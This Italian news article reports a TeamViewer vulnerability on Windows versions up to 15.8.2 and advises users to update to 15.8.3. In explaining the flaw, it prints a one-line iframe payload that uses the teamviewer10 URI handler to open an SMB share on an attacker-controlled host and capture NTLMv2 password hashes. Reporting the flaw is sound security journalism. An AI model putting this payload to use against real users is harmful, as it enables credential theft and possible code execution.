Se usate TeamViewer aggiornatelo subito: scoperto un pericoloso bug

TeamViewer è il noto software compatibile con un gran numero di piattaforme che semplifica e rendere alla portata di tutti la gestione remota.
Oltre a permette l’amministrazione remota di dispositivi Windows, Linux, macOS e prodotti appartenenti alla categoria Internet delle Cose (IoT), TeamViewer ha esteso di recente il supporto per gli smartphone Android di tanti produttori. TeamViewer: controllo remoto completo esteso a tanti dispositivi Android. Usando il client di TeamViewer è possibile collegarsi a un dispositivo Android e amministrarlo a distanza.

Jeffrey Hofmann, ricercatore e security engineer presso Praetorian, ha però appena scoperto una pericolosa vulnerabilità che può portare all’esecuzione di codice in modalità remota.

Com’è spiegato a questo indirizzo, un aggressore può semplicemente inserire un iframe in un qualunque sito web e invitare l’utente a visitare la pagina. Inserendo teamviewer10: --play \\attacker-IP\share\fake.tvs come attributo del tag iframe, l’aggressore può disporre l’istantanea apertura di una cartella condivisa via SMB su un server remoto sotto il suo controllo.

Utilizzando la sintassi indicata, TeamViwer – installato sul PC dell’utente – viene indotto ad aprire la risorsa. La richiesta pervenuta al server remoto potrà quindi essere utilizzata per eseguire codice arbitrario sul sistema dell’utente oppure per appropriarsi dell’hash della password usata dall’utente a protezione del suo account.

Quando ci si collega con Windows a una risorsa condivisa via SMB (vedere Aiuto, non riesco a vedere le cartelle condivise in Windows) il sistema operativo trasmette in automatico nome utente e hash NTLMv2 dell’account in uso. Con uno sforzo quasi nullo, l’aggressore può così impadronirsi della password altrui.

Il problema scoperto in TeamViewer ci ricorda molto da vicino quello che avevamo segnalato tempo fa e relativo ai collegamenti di Windows (file .lnk): Disattivate il download automatico dei file nel browser: attacchi in vista.

Secondo quanto riferisce TeamViewer, il problema di sicurezza interesserebbe tutte le release per i sistemi Windows dalla versione 8 fino alla 15.8.2 compresa. Agli utenti viene consigliato di aggiornare immediatamente alla versione 15.8.3 per mettersi al riparo da qualunque rischio di aggressione.

Per verificare la versione di TeamViewer in uso è sufficiente fare clic sul menu Aiuto quindi scegliere Informazioni su TeamViewer.